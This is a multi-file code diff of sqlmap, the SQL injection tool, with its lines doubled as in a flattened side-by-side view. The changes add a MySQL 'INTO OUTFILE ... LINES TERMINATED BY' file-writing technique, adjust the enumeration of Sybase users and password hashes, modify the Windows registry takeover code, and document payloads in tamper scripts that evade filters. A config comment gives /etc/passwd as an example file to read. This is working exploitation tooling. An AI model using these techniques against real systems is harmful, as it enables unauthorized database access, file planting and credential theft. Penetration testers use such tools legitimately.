from lib.core.exception import SqlmapNoneDataException from lib.core.exception import SqlmapNoneDataException
from lib.request import inject from lib.request import inject
from lib.request.connect import Connect as Request
from lib.techniques.union.use import unionUse from lib.techniques.union.use import unionUse
from plugins.generic.filesystem import Filesystem as GenericFilesystem from plugins.generic.filesystem import Filesystem as GenericFilesystem
@@ -112,6 +116,34 @@ class Filesystem(GenericFilesystem):
return self.askCheckWrittenFile(wFile, dFile, forceCheck) return self.askCheckWrittenFile(wFile, dFile, forceCheck)
def linesTerminatedWriteFile(self, wFile, dFile, fileType, forceCheck=False):
logger.debug("encoding file to its hexadecimal string value")
fcEncodedList = self.fileEncode(wFile, "hex", True)
fcEncodedStr = fcEncodedList[0][2:]
fcEncodedStrLen = len(fcEncodedStr)
if kb.injection.place == PLACE.GET and fcEncodedStrLen > 8000:
warnMsg = "the injection is on a GET parameter and the file "
warnMsg += "to be written hexadecimal value is %d " % fcEncodedStrLen
warnMsg += "bytes, this might cause errors in the file "
warnMsg += "writing process"
logger.warn(warnMsg)
debugMsg = "exporting the %s file content to file '%s'" % (fileType, dFile)
logger.debug(debugMsg)
query = getSQLSnippet(DBMS.MYSQL, "write_file_limit", OUTFILE=dFile, HEXSTRING=fcEncodedStr)
query = agent.prefixQuery(query) # Note: No need for suffix as 'write_file_limit' already ends with comment (required)
payload = agent.payload(newValue=query)
page = Request.queryPage(payload)
warnMsg = "expect junk characters inside the "
warnMsg += "file as a leftover from original query"
singleTimeWarnMessage(warnMsg)
return self.askCheckWrittenFile(wFile, dFile, forceCheck)
def stackedWriteFile(self, wFile, dFile, fileType, forceCheck=False): def stackedWriteFile(self, wFile, dFile, fileType, forceCheck=False):
debugMsg = "creating a support table to write the hexadecimal " debugMsg = "creating a support table to write the hexadecimal "
debugMsg += "encoded file to" debugMsg += "encoded file to"
@@ -130,6 +162,8 @@ class Filesystem(GenericFilesystem):
logger.debug("inserting the hexadecimal encoded file to the support table") logger.debug("inserting the hexadecimal encoded file to the support table")
inject.goStacked("SET GLOBAL max_allowed_packet = %d" % (1024 * 1024)) # 1MB (Note: https://github.com/sqlmapproject/sqlmap/issues/3230)
for sqlQuery in sqlQueries: for sqlQuery in sqlQueries:
inject.goStacked(sqlQuery) inject.goStacked(sqlQuery)

View File

@@ -48,11 +48,11 @@ class Fingerprint(GenericFingerprint):
(50000, 50096), # MySQL 5.0 (50000, 50096), # MySQL 5.0
(50100, 50172), # MySQL 5.1 (50100, 50172), # MySQL 5.1
(50400, 50404), # MySQL 5.4 (50400, 50404), # MySQL 5.4
(50500, 50558), # MySQL 5.5 (50500, 50564), # MySQL 5.5
(50600, 50638), # MySQL 5.6 (50600, 50644), # MySQL 5.6
(50700, 50720), # MySQL 5.7 (50700, 50726), # MySQL 5.7
(60000, 60014), # MySQL 6.0 (60000, 60014), # MySQL 6.0
(80000, 80003), # MySQL 8.0 (80000, 80015), # MySQL 8.0
) )
index = -1 index = -1
@@ -124,7 +124,7 @@ class Fingerprint(GenericFingerprint):
value += "\n%scomment injection fingerprint: %s" % (blank, comVer) value += "\n%scomment injection fingerprint: %s" % (blank, comVer)
if kb.bannerFp: if kb.bannerFp:
banVer = kb.bannerFp["dbmsVersion"] if "dbmsVersion" in kb.bannerFp else None banVer = kb.bannerFp.get("dbmsVersion")
if banVer and re.search(r"-log$", kb.data.banner): if banVer and re.search(r"-log$", kb.data.banner):
banVer += ", logging enabled" banVer += ", logging enabled"

View File

@@ -46,7 +46,7 @@ class Fingerprint(GenericFingerprint):
value += "active fingerprint: %s" % actVer value += "active fingerprint: %s" % actVer
if kb.bannerFp: if kb.bannerFp:
banVer = kb.bannerFp["dbmsVersion"] if 'dbmsVersion' in kb.bannerFp else None banVer = kb.bannerFp.get("dbmsVersion")
banVer = Format.getDbms([banVer]) banVer = Format.getDbms([banVer])
value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)

View File

@@ -45,7 +45,7 @@ class Fingerprint(GenericFingerprint):
value += "active fingerprint: %s" % actVer value += "active fingerprint: %s" % actVer
if kb.bannerFp: if kb.bannerFp:
banVer = kb.bannerFp["dbmsVersion"] if 'dbmsVersion' in kb.bannerFp else None banVer = kb.bannerFp.get("dbmsVersion")
banVer = Format.getDbms([banVer]) banVer = Format.getDbms([banVer])
value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)
@@ -100,9 +100,9 @@ class Fingerprint(GenericFingerprint):
if inject.checkBooleanExpression("XMLTABLE(NULL) IS NULL"): if inject.checkBooleanExpression("XMLTABLE(NULL) IS NULL"):
Backend.setVersion(">= 10.0") Backend.setVersion(">= 10.0")
elif inject.checkBooleanExpression("SIND(0)=0"): elif inject.checkBooleanExpression("SIND(0)=0"):
Backend.setVersion(">= 9.6.0", "< 10.0") Backend.setVersionList([">= 9.6.0", "< 10.0"])
elif inject.checkBooleanExpression("TO_JSONB(1) IS NOT NULL"): elif inject.checkBooleanExpression("TO_JSONB(1) IS NOT NULL"):
Backend.setVersion(">= 9.5.0", "< 9.6.0") Backend.setVersionList([">= 9.5.0", "< 9.6.0"])
elif inject.checkBooleanExpression("JSON_TYPEOF(NULL) IS NULL"): elif inject.checkBooleanExpression("JSON_TYPEOF(NULL) IS NULL"):
Backend.setVersionList([">= 9.4.0", "< 9.5.0"]) Backend.setVersionList([">= 9.4.0", "< 9.5.0"])
elif inject.checkBooleanExpression("ARRAY_REPLACE(NULL,1,1) IS NULL"): elif inject.checkBooleanExpression("ARRAY_REPLACE(NULL,1,1) IS NULL"):

View File

@@ -45,7 +45,7 @@ class Fingerprint(GenericFingerprint):
value += "active fingerprint: %s" % actVer value += "active fingerprint: %s" % actVer
if kb.bannerFp: if kb.bannerFp:
banVer = kb.bannerFp["dbmsVersion"] banVer = kb.bannerFp.get("dbmsVersion")
banVer = Format.getDbms([banVer]) banVer = Format.getDbms([banVer])
value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)

View File

@@ -38,7 +38,6 @@ class Enumeration(GenericEnumeration):
rootQuery = queries[DBMS.SYBASE].users rootQuery = queries[DBMS.SYBASE].users
randStr = randomStr()
query = rootQuery.inband.query query = rootQuery.inband.query
if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct:
@@ -47,7 +46,7 @@ class Enumeration(GenericEnumeration):
blinds = (True,) blinds = (True,)
for blind in blinds: for blind in blinds:
retVal = pivotDumpTable("(%s) AS %s" % (query, randStr), ['%s.name' % randStr], blind=blind) retVal = pivotDumpTable("(%s) AS %s" % (query, kb.aliasName), ['%s.name' % kb.aliasName], blind=blind, alias=kb.aliasName)
if retVal: if retVal:
kb.data.cachedUsers = retVal[0].values()[0] kb.data.cachedUsers = retVal[0].values()[0]
@@ -94,7 +93,6 @@ class Enumeration(GenericEnumeration):
logger.info(infoMsg) logger.info(infoMsg)
rootQuery = queries[DBMS.SYBASE].dbs rootQuery = queries[DBMS.SYBASE].dbs
randStr = randomStr()
query = rootQuery.inband.query query = rootQuery.inband.query
if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct:
@@ -103,7 +101,7 @@ class Enumeration(GenericEnumeration):
blinds = [True] blinds = [True]
for blind in blinds: for blind in blinds:
retVal = pivotDumpTable("(%s) AS %s" % (query, randStr), ['%s.name' % randStr], blind=blind) retVal = pivotDumpTable("(%s) AS %s" % (query, kb.aliasName), ['%s.name' % kb.aliasName], blind=blind, alias=kb.aliasName)
if retVal: if retVal:
kb.data.cachedDbs = retVal[0].values()[0] kb.data.cachedDbs = retVal[0].values()[0]
@@ -146,9 +144,8 @@ class Enumeration(GenericEnumeration):
for db in dbs: for db in dbs:
for blind in blinds: for blind in blinds:
randStr = randomStr()
query = rootQuery.inband.query % db query = rootQuery.inband.query % db
retVal = pivotDumpTable("(%s) AS %s" % (query, randStr), ['%s.name' % randStr], blind=blind) retVal = pivotDumpTable("(%s) AS %s" % (query, kb.aliasName), ['%s.name' % kb.aliasName], blind=blind, alias=kb.aliasName)
if retVal: if retVal:
for table in retVal[0].values()[0]: for table in retVal[0].values()[0]:
@@ -210,7 +207,7 @@ class Enumeration(GenericEnumeration):
raise SqlmapNoneDataException(errMsg) raise SqlmapNoneDataException(errMsg)
for tbl in tblList: for tbl in tblList:
tblList[tblList.index(tbl)] = safeSQLIdentificatorNaming(tbl) tblList[tblList.index(tbl)] = safeSQLIdentificatorNaming(tbl, True)
if bruteForce: if bruteForce:
resumeAvailable = False resumeAvailable = False
@@ -268,7 +265,7 @@ class Enumeration(GenericEnumeration):
if dumpMode and colList: if dumpMode and colList:
table = {} table = {}
table[safeSQLIdentificatorNaming(tbl)] = dict((_, None) for _ in colList) table[safeSQLIdentificatorNaming(tbl, True)] = dict((_, None) for _ in colList)
kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] = table kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] = table
continue continue
@@ -278,18 +275,17 @@ class Enumeration(GenericEnumeration):
logger.info(infoMsg) logger.info(infoMsg)
for blind in blinds: for blind in blinds:
randStr = randomStr()
query = rootQuery.inband.query % (conf.db, conf.db, conf.db, conf.db, conf.db, conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl)) query = rootQuery.inband.query % (conf.db, conf.db, conf.db, conf.db, conf.db, conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl))
retVal = pivotDumpTable("(%s) AS %s" % (query, randStr), ['%s.name' % randStr, '%s.usertype' % randStr], blind=blind) retVal = pivotDumpTable("(%s) AS %s" % (query, kb.aliasName), ['%s.name' % kb.aliasName, '%s.usertype' % kb.aliasName], blind=blind, alias=kb.aliasName)
if retVal: if retVal:
table = {} table = {}
columns = {} columns = {}
for name, type_ in filterPairValues(zip(retVal[0]["%s.name" % randStr], retVal[0]["%s.usertype" % randStr])): for name, type_ in filterPairValues(zip(retVal[0]["%s.name" % kb.aliasName], retVal[0]["%s.usertype" % kb.aliasName])):
columns[name] = SYBASE_TYPES.get(int(type_) if isinstance(type_, basestring) and type_.isdigit() else type_, type_) columns[name] = SYBASE_TYPES.get(int(type_) if isinstance(type_, basestring) and type_.isdigit() else type_, type_)
table[safeSQLIdentificatorNaming(tbl)] = columns table[safeSQLIdentificatorNaming(tbl, True)] = columns
kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] = table kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] = table
break break

View File

@@ -46,7 +46,7 @@ class Fingerprint(GenericFingerprint):
value += "active fingerprint: %s" % actVer value += "active fingerprint: %s" % actVer
if kb.bannerFp: if kb.bannerFp:
banVer = kb.bannerFp["dbmsVersion"] banVer = kb.bannerFp.get("dbmsVersion")
banVer = Format.getDbms([banVer]) banVer = Format.getDbms([banVer])
value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)

View File

@@ -88,6 +88,7 @@ class Custom:
try: try:
query = raw_input("sql-shell> ") query = raw_input("sql-shell> ")
query = getUnicode(query, encoding=sys.stdin.encoding) query = getUnicode(query, encoding=sys.stdin.encoding)
query = query.strip("; ")
except KeyboardInterrupt: except KeyboardInterrupt:
print print
errMsg = "user aborted" errMsg = "user aborted"

View File

@@ -261,24 +261,28 @@ class Databases:
rootQuery = queries[Backend.getIdentifiedDbms()].tables rootQuery = queries[Backend.getIdentifiedDbms()].tables
if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct:
query = rootQuery.inband.query values = []
condition = rootQuery.inband.condition if 'condition' in rootQuery.inband else None
if condition: for query, condition in ((rootQuery.inband.query, getattr(rootQuery.inband, "condition", None)), (getattr(rootQuery.inband, "query2", None), getattr(rootQuery.inband, "condition2", None))):
if not Backend.isDbms(DBMS.SQLITE): if not isNoneValue(values) or not query:
query += " WHERE %s" % condition break
if conf.excludeSysDbs: if condition:
infoMsg = "skipping system database%s '%s'" % ("s" if len(self.excludeDbsList) > 1 else "", ", ".join(unsafeSQLIdentificatorNaming(db) for db in self.excludeDbsList)) if not Backend.isDbms(DBMS.SQLITE):
logger.info(infoMsg) query += " WHERE %s" % condition
query += " IN (%s)" % ','.join("'%s'" % unsafeSQLIdentificatorNaming(db) for db in sorted(dbs) if db not in self.excludeDbsList)
else:
query += " IN (%s)" % ','.join("'%s'" % unsafeSQLIdentificatorNaming(db) for db in sorted(dbs))
if len(dbs) < 2 and ("%s," % condition) in query: if conf.excludeSysDbs:
query = query.replace("%s," % condition, "", 1) infoMsg = "skipping system database%s '%s'" % ("s" if len(self.excludeDbsList) > 1 else "", ", ".join(unsafeSQLIdentificatorNaming(db) for db in self.excludeDbsList))
logger.info(infoMsg)
query += " IN (%s)" % ','.join("'%s'" % unsafeSQLIdentificatorNaming(db) for db in sorted(dbs) if db not in self.excludeDbsList)
else:
query += " IN (%s)" % ','.join("'%s'" % unsafeSQLIdentificatorNaming(db) for db in sorted(dbs))
values = inject.getValue(query, blind=False, time=False) if len(dbs) < 2 and ("%s," % condition) in query:
query = query.replace("%s," % condition, "", 1)
if query:
values = inject.getValue(query, blind=False, time=False)
if not isNoneValue(values): if not isNoneValue(values):
values = filter(None, arrayizeValue(values)) values = filter(None, arrayizeValue(values))
@@ -601,6 +605,8 @@ class Databases:
if values is None: if values is None:
values = inject.getValue(query, blind=False, time=False) values = inject.getValue(query, blind=False, time=False)
if values and isinstance(values[0], basestring):
values = [values]
if Backend.isDbms(DBMS.MSSQL) and isNoneValue(values): if Backend.isDbms(DBMS.MSSQL) and isNoneValue(values):
index, values = 1, [] index, values = 1, []

View File

@@ -129,10 +129,7 @@ class Entries:
else: else:
kb.dumpTable = "%s.%s" % (conf.db, tbl) kb.dumpTable = "%s.%s" % (conf.db, tbl)
if not safeSQLIdentificatorNaming(conf.db) in kb.data.cachedColumns \ if safeSQLIdentificatorNaming(conf.db) not in kb.data.cachedColumns or safeSQLIdentificatorNaming(tbl, True) not in kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] or not kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)][safeSQLIdentificatorNaming(tbl, True)]:
or safeSQLIdentificatorNaming(tbl, True) not in \
kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] \
or not kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)][safeSQLIdentificatorNaming(tbl, True)]:
warnMsg = "unable to enumerate the columns for table " warnMsg = "unable to enumerate the columns for table "
warnMsg += "'%s' in database" % unsafeSQLIdentificatorNaming(tbl) warnMsg += "'%s' in database" % unsafeSQLIdentificatorNaming(tbl)
warnMsg += " '%s'" % unsafeSQLIdentificatorNaming(conf.db) warnMsg += " '%s'" % unsafeSQLIdentificatorNaming(conf.db)

View File

@@ -284,17 +284,23 @@ class Filesystem:
if conf.direct or isStackingAvailable(): if conf.direct or isStackingAvailable():
if isStackingAvailable(): if isStackingAvailable():
debugMsg = "going to upload the file '%s' with " % fileType debugMsg = "going to upload the file '%s' with " % fileType
debugMsg += "stacked query SQL injection technique" debugMsg += "stacked query technique"
logger.debug(debugMsg) logger.debug(debugMsg)
written = self.stackedWriteFile(localFile, remoteFile, fileType, forceCheck) written = self.stackedWriteFile(localFile, remoteFile, fileType, forceCheck)
self.cleanup(onlyFileTbl=True) self.cleanup(onlyFileTbl=True)
elif isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) and Backend.isDbms(DBMS.MYSQL): elif isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) and Backend.isDbms(DBMS.MYSQL):
debugMsg = "going to upload the file '%s' with " % fileType debugMsg = "going to upload the file '%s' with " % fileType
debugMsg += "UNION query SQL injection technique" debugMsg += "UNION query technique"
logger.debug(debugMsg) logger.debug(debugMsg)
written = self.unionWriteFile(localFile, remoteFile, fileType, forceCheck) written = self.unionWriteFile(localFile, remoteFile, fileType, forceCheck)
elif Backend.isDbms(DBMS.MYSQL):
debugMsg = "going to upload the file '%s' with " % fileType
debugMsg += "LINES TERMINATED BY technique"
logger.debug(debugMsg)
written = self.linesTerminatedWriteFile(localFile, remoteFile, fileType, forceCheck)
else: else:
errMsg = "none of the SQL injection techniques detected can " errMsg = "none of the SQL injection techniques detected can "
errMsg += "be used to write files to the underlying file " errMsg += "be used to write files to the underlying file "

View File

@@ -125,8 +125,7 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
raise SqlmapMissingPrivileges(errMsg) raise SqlmapMissingPrivileges(errMsg)
try: try:
from impacket import ImpactDecoder __import__("impacket")
from impacket import ImpactPacket
except ImportError: except ImportError:
errMsg = "sqlmap requires 'python-impacket' third-party library " errMsg = "sqlmap requires 'python-impacket' third-party library "
errMsg += "in order to run icmpsh master. You can get it at " errMsg += "in order to run icmpsh master. You can get it at "
@@ -372,7 +371,7 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
else: else:
regVal = conf.regVal regVal = conf.regVal
infoMsg = "reading Windows registry path '%s\%s' " % (regKey, regVal) infoMsg = "reading Windows registry path '%s\\%s' " % (regKey, regVal)
logger.info(infoMsg) logger.info(infoMsg)
return self.readRegKey(regKey, regVal, True) return self.readRegKey(regKey, regVal, True)
@@ -417,7 +416,7 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
else: else:
regType = conf.regType regType = conf.regType
infoMsg = "adding Windows registry path '%s\%s' " % (regKey, regVal) infoMsg = "adding Windows registry path '%s\\%s' " % (regKey, regVal)
infoMsg += "with data '%s'. " % regData infoMsg += "with data '%s'. " % regData
infoMsg += "This will work only if the user running the database " infoMsg += "This will work only if the user running the database "
infoMsg += "process has privileges to modify the Windows registry." infoMsg += "process has privileges to modify the Windows registry."
@@ -449,12 +448,12 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
regVal = conf.regVal regVal = conf.regVal
message = "are you sure that you want to delete the Windows " message = "are you sure that you want to delete the Windows "
message += "registry path '%s\%s? [y/N] " % (regKey, regVal) message += "registry path '%s\\%s? [y/N] " % (regKey, regVal)
if not readInput(message, default='N', boolean=True): if not readInput(message, default='N', boolean=True):
return return
infoMsg = "deleting Windows registry path '%s\%s'. " % (regKey, regVal) infoMsg = "deleting Windows registry path '%s\\%s'. " % (regKey, regVal)
infoMsg += "This will work only if the user running the database " infoMsg += "This will work only if the user running the database "
infoMsg += "process has privileges to modify the Windows registry." infoMsg += "process has privileges to modify the Windows registry."
logger.info(infoMsg) logger.info(infoMsg)

View File

@@ -187,13 +187,12 @@ class Users:
query += " OR ".join("%s = '%s'" % (condition, user) for user in sorted(users)) query += " OR ".join("%s = '%s'" % (condition, user) for user in sorted(users))
if Backend.isDbms(DBMS.SYBASE): if Backend.isDbms(DBMS.SYBASE):
randStr = randomStr()
getCurrentThreadData().disableStdOut = True getCurrentThreadData().disableStdOut = True
retVal = pivotDumpTable("(%s) AS %s" % (query, randStr), ['%s.name' % randStr, '%s.password' % randStr], blind=False) retVal = pivotDumpTable("(%s) AS %s" % (query, kb.aliasName), ['%s.name' % kb.aliasName, '%s.password' % kb.aliasName], blind=False)
if retVal: if retVal:
for user, password in filterPairValues(zip(retVal[0]["%s.name" % randStr], retVal[0]["%s.password" % randStr])): for user, password in filterPairValues(zip(retVal[0]["%s.name" % kb.aliasName], retVal[0]["%s.password" % kb.aliasName])):
if user not in kb.data.cachedUsersPasswords: if user not in kb.data.cachedUsersPasswords:
kb.data.cachedUsersPasswords[user] = [password] kb.data.cachedUsersPasswords[user] = [password]
else: else:
@@ -228,13 +227,12 @@ class Users:
if Backend.isDbms(DBMS.SYBASE): if Backend.isDbms(DBMS.SYBASE):
getCurrentThreadData().disableStdOut = True getCurrentThreadData().disableStdOut = True
randStr = randomStr()
query = rootQuery.inband.query query = rootQuery.inband.query
retVal = pivotDumpTable("(%s) AS %s" % (query, randStr), ['%s.name' % randStr, '%s.password' % randStr], blind=True) retVal = pivotDumpTable("(%s) AS %s" % (query, kb.aliasName), ['%s.name' % kb.aliasName, '%s.password' % kb.aliasName], blind=True)
if retVal: if retVal:
for user, password in filterPairValues(zip(retVal[0]["%s.name" % randStr], retVal[0]["%s.password" % randStr])): for user, password in filterPairValues(zip(retVal[0]["%s.name" % kb.aliasName], retVal[0]["%s.password" % kb.aliasName])):
password = "0x%s" % hexencode(password, conf.encoding).upper() password = "0x%s" % hexencode(password, conf.encoding).upper()
if user not in kb.data.cachedUsersPasswords: if user not in kb.data.cachedUsersPasswords:

View File

@@ -1 +1 @@
LIMIT 0,1 INTO OUTFILE '%OUTFILE%' LINES TERMINATED BY 0x%HEXSTRING%-- LIMIT 0,1 INTO OUTFILE '%OUTFILE%' LINES TERMINATED BY 0x%HEXSTRING%-- -

View File

@@ -579,15 +579,15 @@ shLib =
# Read a specific file from the back-end DBMS underlying file system. # Read a specific file from the back-end DBMS underlying file system.
# Examples: /etc/passwd or C:\boot.ini # Examples: /etc/passwd or C:\boot.ini
rFile = fileRead =
# Write a local file to a specific path on the back-end DBMS underlying # Write a local file to a specific path on the back-end DBMS underlying
# file system. # file system.
# Example: /tmp/sqlmap.txt or C:\WINNT\Temp\sqlmap.txt # Example: /tmp/sqlmap.txt or C:\WINNT\Temp\sqlmap.txt
wFile = fileWrite =
# Back-end DBMS absolute filepath to write the file to. # Back-end DBMS absolute filepath to write the file to.
dFile = fileDest =
# These options can be used to access the back-end database management # These options can be used to access the back-end database management
@@ -778,6 +778,10 @@ googlePage = 1
# Valid: True or False # Valid: True or False
identifyWaf = False identifyWaf = False
# Display list of available tamper scripts
# Valid: True or False
listTampers = False
# Imitate smartphone through HTTP User-Agent header. # Imitate smartphone through HTTP User-Agent header.
# Valid: True or False # Valid: True or False
mobile = False mobile = False

View File

@@ -5,37 +5,37 @@ Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission See the file 'LICENSE' for copying permission
""" """
import sys
sys.dont_write_bytecode = True
try: try:
__import__("lib.utils.versioncheck") # this has to be the first non-standard import import sys
except ImportError:
exit("[!] wrong installation detected (missing modules). Visit 'https://github.com/sqlmapproject/sqlmap/#installation' for further details")
import bdb sys.dont_write_bytecode = True
import distutils
import glob
import inspect
import json
import logging
import os
import re
import shutil
import sys
import thread
import threading
import time
import traceback
import warnings
warnings.filterwarnings(action="ignore", message=".*was already imported", category=UserWarning) try:
warnings.filterwarnings(action="ignore", category=DeprecationWarning) __import__("lib.utils.versioncheck") # this has to be the first non-standard import
except ImportError:
exit("[!] wrong installation detected (missing modules). Visit 'https://github.com/sqlmapproject/sqlmap/#installation' for further details")
from lib.core.data import logger import bdb
import distutils
import glob
import inspect
import json
import logging
import os
import re
import shutil
import sys
import thread
import threading
import time
import traceback
import warnings
warnings.filterwarnings(action="ignore", message=".*was already imported", category=UserWarning)
warnings.filterwarnings(action="ignore", category=DeprecationWarning)
from lib.core.data import logger
try:
from lib.core.common import banner from lib.core.common import banner
from lib.core.common import checkIntegrity from lib.core.common import checkIntegrity
from lib.core.common import createGithubIssue from lib.core.common import createGithubIssue
@@ -67,9 +67,13 @@ try:
from lib.parse.cmdline import cmdLineParser from lib.parse.cmdline import cmdLineParser
except KeyboardInterrupt: except KeyboardInterrupt:
errMsg = "user aborted" errMsg = "user aborted"
logger.error(errMsg)
raise SystemExit if "logger" in globals():
logger.error(errMsg)
raise SystemExit
else:
import time
exit("\r[%s] [ERROR] %s" % (time.strftime("%X"), errMsg))
def modulePath(): def modulePath():
""" """
@@ -273,6 +277,12 @@ def main():
logger.error(errMsg) logger.error(errMsg)
raise SystemExit raise SystemExit
elif all(_ in excMsg for _ in ("scramble_caching_sha2", "TypeError")):
errMsg = "please downgrade the 'PyMySQL' package (=< 0.8.1) "
errMsg += "(Reference: https://github.com/PyMySQL/PyMySQL/issues/700)"
logger.error(errMsg)
raise SystemExit
elif "must be pinned buffer, not bytearray" in excMsg: elif "must be pinned buffer, not bytearray" in excMsg:
errMsg = "error occurred at Python interpreter which " errMsg = "error occurred at Python interpreter which "
errMsg += "is fixed in 2.7.x. Please update accordingly " errMsg += "is fixed in 2.7.x. Please update accordingly "
@@ -325,7 +335,11 @@ def main():
file_ = match.group(1) file_ = match.group(1)
file_ = os.path.relpath(file_, os.path.dirname(__file__)) file_ = os.path.relpath(file_, os.path.dirname(__file__))
file_ = file_.replace("\\", '/') file_ = file_.replace("\\", '/')
file_ = re.sub(r"\.\./", '/', file_).lstrip('/') if "../" in file_:
file_ = re.sub(r"(\.\./)+", '/', file_)
else:
file_ = file_.lstrip('/')
file_ = re.sub(r"/{2,}", '/', file_)
excMsg = excMsg.replace(match.group(1), file_) excMsg = excMsg.replace(match.group(1), file_)
errMsg = maskSensitiveData(errMsg) errMsg = maskSensitiveData(errMsg)

View File

@@ -40,8 +40,8 @@ def main():
# Parse command line options # Parse command line options
apiparser = optparse.OptionParser() apiparser = optparse.OptionParser()
apiparser.add_option("-s", "--server", help="Act as a REST-JSON API server", default=RESTAPI_DEFAULT_PORT, action="store_true") apiparser.add_option("-s", "--server", help="Run as a REST-JSON API server", default=RESTAPI_DEFAULT_PORT, action="store_true")
apiparser.add_option("-c", "--client", help="Act as a REST-JSON API client", default=RESTAPI_DEFAULT_PORT, action="store_true") apiparser.add_option("-c", "--client", help="Run as a REST-JSON API client", default=RESTAPI_DEFAULT_PORT, action="store_true")
apiparser.add_option("-H", "--host", help="Host of the REST-JSON API server (default \"%s\")" % RESTAPI_DEFAULT_ADDRESS, default=RESTAPI_DEFAULT_ADDRESS, action="store") apiparser.add_option("-H", "--host", help="Host of the REST-JSON API server (default \"%s\")" % RESTAPI_DEFAULT_ADDRESS, default=RESTAPI_DEFAULT_ADDRESS, action="store")
apiparser.add_option("-p", "--port", help="Port of the the REST-JSON API server (default %d)" % RESTAPI_DEFAULT_PORT, default=RESTAPI_DEFAULT_PORT, type="int", action="store") apiparser.add_option("-p", "--port", help="Port of the the REST-JSON API server (default %d)" % RESTAPI_DEFAULT_PORT, default=RESTAPI_DEFAULT_PORT, type="int", action="store")
apiparser.add_option("--adapter", help="Server (bottle) adapter to use (default \"%s\")" % RESTAPI_DEFAULT_ADAPTER, default=RESTAPI_DEFAULT_ADAPTER, action="store") apiparser.add_option("--adapter", help="Server (bottle) adapter to use (default \"%s\")" % RESTAPI_DEFAULT_ADAPTER, default=RESTAPI_DEFAULT_ADAPTER, action="store")

View File

@@ -18,6 +18,9 @@ def tamper(payload, **kwargs):
""" """
Replaces each (MySQL) 0x<hex> encoded string with equivalent CONCAT(CHAR(),...) counterpart Replaces each (MySQL) 0x<hex> encoded string with equivalent CONCAT(CHAR(),...) counterpart
Requirement:
* MySQL
Tested against: Tested against:
* MySQL 4, 5.0 and 5.5 * MySQL 4, 5.0 and 5.5

View File

@@ -14,7 +14,7 @@ def dependencies():
def tamper(payload, **kwargs): def tamper(payload, **kwargs):
""" """
Replaces apostrophe character with its UTF-8 full width counterpart Replaces apostrophe character (') with its UTF-8 full width counterpart (e.g. ' -> %EF%BC%87)
References: References:
* http://www.utf8-chartable.de/unicode-utf8-table.pl?start=65280&number=128 * http://www.utf8-chartable.de/unicode-utf8-table.pl?start=65280&number=128

View File

@@ -14,7 +14,7 @@ def dependencies():
def tamper(payload, **kwargs): def tamper(payload, **kwargs):
""" """
Replaces apostrophe character with its illegal double unicode counterpart Replaces apostrophe character (') with its illegal double unicode counterpart (e.g. ' -> %00%27)
>>> tamper("1 AND '1'='1") >>> tamper("1 AND '1'='1")
'1 AND %00%271%00%27=%00%271' '1 AND %00%271%00%27=%00%271'

View File

@@ -18,7 +18,7 @@ def dependencies():
def tamper(payload, **kwargs): def tamper(payload, **kwargs):
""" """
Appends encoded NULL byte character at the end of payload Appends (Access) NULL byte character (%00) at the end of payload
Requirement: Requirement:
* Microsoft Access * Microsoft Access

View File

@@ -17,7 +17,7 @@ def dependencies():
def tamper(payload, **kwargs): def tamper(payload, **kwargs):
""" """
Base64 all characters in a given payload Base64-encodes all characters in a given payload
>>> tamper("1' AND SLEEP(5)#") >>> tamper("1' AND SLEEP(5)#")
'MScgQU5EIFNMRUVQKDUpIw==' 'MScgQU5EIFNMRUVQKDUpIw=='

View File

@@ -16,8 +16,7 @@ def dependencies():
def tamper(payload, **kwargs): def tamper(payload, **kwargs):
""" """
Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #' Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #' and equals operator ('=') with 'BETWEEN # AND #'
Replaces equals operator ('=') with 'BETWEEN # AND #'
Tested against: Tested against:
* Microsoft SQL Server 2005 * Microsoft SQL Server 2005

View File

@@ -17,8 +17,7 @@ def dependencies():
def tamper(payload, **kwargs): def tamper(payload, **kwargs):
""" """
